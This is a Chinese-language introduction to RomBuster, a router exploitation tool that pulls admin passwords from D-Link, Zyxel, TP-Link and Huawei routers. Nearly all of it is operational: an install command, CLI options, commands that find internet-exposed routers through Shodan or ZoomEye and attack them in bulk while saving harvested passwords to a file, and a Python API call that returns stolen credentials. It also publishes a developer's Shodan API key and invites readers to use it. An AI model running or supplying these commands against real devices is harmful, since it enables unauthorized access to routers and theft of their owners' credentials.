[[416111]]

關于RomBuster

RomBuster是一款功能強大的針對網(wǎng)絡路由器的漏洞利用工具，該工具能夠幫助廣大研究人員對網(wǎng)絡路由器的安全性進行分析，并獲取目標路由器的管理員密碼。

功能介紹

• 能夠利用大多數(shù)熱門路由器中的安全漏洞，例如D-Link、Zyxel、TP-Link和華為等等。
• 經(jīng)過優(yōu)化處理，可從列表中讀取多個目標路由器，并進行安全分析和漏洞利用。
• 簡單的命令行接口和API用法。

工具安裝

由于RomBuster使用Python3開發(fā)，因此首先需要在本地設備上安裝并配置好Python3環(huán)境。接下來，廣大研究人員可以使用下列命令下載并安裝RomBuster：

pip3 install git+https://github.com/EntySec/RomBuster 

基礎使用

RomBuster的使用非常簡單，我們只需要在命令行終端中輸入“rombuster”命令即可使用RomBuster：

usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] 
 
                 [--zoomeye ZOOMEYE] [-p PAGES] 
 
  
 
RomBuster is a router exploitation tool that allows to disclosure network 
 
router admin password. 
 
  
 
optional arguments: 
 
  -h, --help            顯示這個幫助信息并退出 
 
  -o OUTPUT, --output OUTPUT 
 
                        將結果存儲至文件 
 
  -i INPUT, --input INPUT 
 
                        地址列表輸入文件 
 
  -a ADDRESS, --address ADDRESS 
 
                        提供單個地址 
 
  --shodan SHODAN       通過網(wǎng)絡利用遠程設備所使用的Shodan API密鑰 
 
  --zoomeye ZOOMEYE     通過網(wǎng)絡利用遠程設備所使用的ZoomEye API密鑰 
 
  -p PAGES, --pages PAGES 
 
                        需要通過ZoomEye獲取的頁面數(shù)量 

工具使用樣例

(1) 攻擊單個路由器

下列命令可以攻擊單個網(wǎng)絡路由器：

rombuster -a 192.168.99.1 

(2) 通過網(wǎng)絡攻擊遠程路由器

接下來，我們可以使用Shodan搜索引擎來搜索并攻擊網(wǎng)絡上的由器：

rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD 

注意：項目中給出的Shodan API密鑰(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是開發(fā)人員自己的專業(yè)版API密鑰，你可以使用你自己的密鑰，當然了你想用開發(fā)人員的也沒意見，大家資源共享嘛!

(3) 從輸入文件獲取目標路由器

我們還可以使用開放數(shù)據(jù)庫中提供的攝像頭地址：

rombuster -i routers.txt -o passwords.txt 

注意：此命令將會攻擊routers.txt中給出的所有攝像頭，并會將所有獲取到的密碼存儲至passwords.txt文件中。

API使用

RomBuster還提供了自己的Python API，可以將其導入至你們自己的項目代碼中并調用其功能：

from rombuster import RomBuster 

(1) 基礎函數(shù)

下面給出的是RomBuster支持的基礎函數(shù)，可以用于利用指定路由器中的安全漏洞：

exploit(address)：攻擊指定地址的單個路由器

(2) 調用樣例

攻擊單個路由器：

from rombuster import RomBuster 
 
  
 
rombuster = RomBuster() 
 
creds = rombuster.exploit('192.168.99.1') 
 
  
 
print(creds) 

項目地址

RomBuster：【GitHub傳送門】